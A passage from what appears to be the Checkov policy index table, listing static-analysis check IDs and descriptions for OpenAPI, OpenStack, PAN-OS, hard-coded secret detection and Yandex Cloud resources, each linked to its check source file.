3573 | CKV_OPENAPI_10 | resource | paths | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py) | -| 3574 | CKV_OPENAPI_11 | resource | securityDefinitions | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | 
[Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py) | -| 3575 | CKV_OPENAPI_12 | resource | securityDefinitions | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py) | -| 3576 | CKV_OPENAPI_13 | resource | securityDefinitions | Ensure security definitions do not use basic auth - version 2.0 files | OpenAPI | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py) | -| 3577 | CKV_OPENAPI_14 | resource | paths | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files | OpenAPI | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py) | -| 3578 | CKV_OPENAPI_15 | resource | paths | Ensure that operation objects do not use basic auth - version 2.0 files | OpenAPI | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py) | -| 3579 | CKV_OPENAPI_16 | resource | paths | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files | OpenAPI | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py) | -| 3580 | CKV_OPENAPI_17 | resource | paths | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files | OpenAPI | 
[OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py) | -| 3581 | CKV_OPENAPI_18 | resource | schemes | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files | OpenAPI | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py) | -| 3582 | CKV_OPENAPI_19 | resource | security | Ensure that global security scope is defined in securityDefinitions - version 2.0 files | OpenAPI | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py) | -| 3583 | CKV_OPENAPI_20 | resource | paths | Ensure that API keys are not sent over cleartext | OpenAPI | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py) | -| 3584 | CKV_OPENAPI_21 | resource | paths | Ensure that arrays have a maximum number of items | OpenAPI | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py) | -| 3585 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | -| 3586 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 3587 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 
0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 3588 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 3589 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 3590 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | -| 3591 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | -| 3592 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | -| 3593 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | 
[InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | -| 3594 | CKV_PAN_2 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml) | -| 3595 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | -| 3596 | CKV_PAN_3 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml) | -| 3597 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 3598 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 3599 | CKV_PAN_4 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure DSRI is not enabled within security policies | Ansible | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml) | -| 3600 | CKV_PAN_5 | 
resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 3601 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 3602 | CKV_PAN_5 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'application' set to 'any' | Ansible | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml) | -| 3603 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 3604 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 3605 | CKV_PAN_6 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'service' set to 'any' | Ansible | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml) | -| 3606 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | 
[PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 3607 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 3608 | CKV_PAN_7 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any' | Ansible | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml) | -| 3609 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 3610 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 3611 | CKV_PAN_8 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure description is populated within security policies | Ansible | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml) | -| 3612 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 3613 | CKV_PAN_9 | resource | 
panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 3614 | CKV_PAN_9 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure a Log Forwarding Profile is selected for each security policy rule | Ansible | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml) | -| 3615 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 3616 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 3617 | CKV_PAN_10 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session end is enabled within security policies | Ansible | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml) | -| 3618 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 3619 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | 
[NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 3620 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 3621 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 3622 | CKV_PAN_12 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Ansible | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml) | -| 3623 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 3624 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 3625 | CKV_PAN_13 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure protocols | Ansible | 
[PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml) | -| 3626 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3627 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3628 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3629 | CKV_PAN_14 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Ansible | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml) | -| 3630 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 3631 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 3632 | CKV_PAN_15 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Ansible | 
[PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml) | -| 3633 | CKV_PAN_16 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels | Ansible | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml) | -| 3634 | CKV_PAN_17 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any' | Ansible | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml) | -| 3635 | CKV_SECRET_1 | Artifactory Credentials | secrets | Artifactory Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3636 | CKV_SECRET_2 | AWS Access Key | secrets | AWS Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3637 | CKV_SECRET_3 | Azure Storage Account access key | secrets | Azure Storage Account access key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3638 | CKV_SECRET_4 | Basic Auth Credentials | secrets | Basic Auth Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3639 | 
CKV_SECRET_5 | Cloudant Credentials | secrets | Cloudant Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3640 | CKV_SECRET_6 | Base64 High Entropy String | secrets | Base64 High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3641 | CKV_SECRET_7 | IBM Cloud IAM Key | secrets | IBM Cloud IAM Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3642 | CKV_SECRET_8 | IBM COS HMAC Credentials | secrets | IBM COS HMAC Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3643 | CKV_SECRET_9 | JSON Web Token | secrets | JSON Web Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3644 | CKV_SECRET_11 | Mailchimp Access Key | secrets | Mailchimp Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3645 | CKV_SECRET_12 | NPM tokens | secrets | NPM tokens | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3646 | CKV_SECRET_13 | Private Key | secrets | Private Key | secrets | 
[policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3647 | CKV_SECRET_14 | Slack Token | secrets | Slack Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3648 | CKV_SECRET_15 | SoftLayer Credentials | secrets | SoftLayer Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3649 | CKV_SECRET_16 | Square OAuth Secret | secrets | Square OAuth Secret | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3650 | CKV_SECRET_17 | Stripe Access Key | secrets | Stripe Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3651 | CKV_SECRET_18 | Twilio API Key | secrets | Twilio API Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3652 | CKV_SECRET_19 | Hex High Entropy String | secrets | Hex High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3653 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | -| 3654 | CKV_YC_1 | resource | 
yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3655 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3656 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3657 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3658 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3659 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3660 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3661 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3662 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3663 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | -| 3664 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | -| 3665 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | -| 3666 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | -| 3667 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | -| 3668 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. 
| Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | -| 3669 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | -| 3670 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | -| 3671 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | -| 3672 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | -| 3673 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3674 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3675 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3676 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3677 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3678 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3679 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3680 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3681 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 3682 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. 
